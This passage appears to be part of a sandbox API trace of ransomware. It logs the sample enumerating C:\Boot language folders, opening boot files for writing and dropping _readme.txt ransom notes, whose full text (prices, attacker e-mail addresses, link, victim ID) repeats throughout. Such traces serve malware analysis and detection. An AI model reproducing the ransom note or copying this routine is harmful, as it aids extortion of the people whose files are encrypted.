unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.069] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.069] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.069] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.069] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.069] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0228.069] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0228.069] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.069] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.070] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.070] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.070] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.070] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0228.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.070] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.070] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.070] PathFindFileNameW (pszPath="") returned="" [0228.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.070] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.071] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.071] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0228.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.071] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.071] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0228.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.071] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0228.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.071] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.071] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.072] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.072] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.072] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.072] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.072] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0228.072] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.072] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.072] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.073] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.073] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.073] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0228.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.073] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.073] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.073] PathFindFileNameW (pszPath="") returned="" [0228.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.073] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.074] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.074] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0228.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.075] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.075] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0228.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.075] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0228.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.075] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.075] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.075] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.075] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x3adfba4 | out: 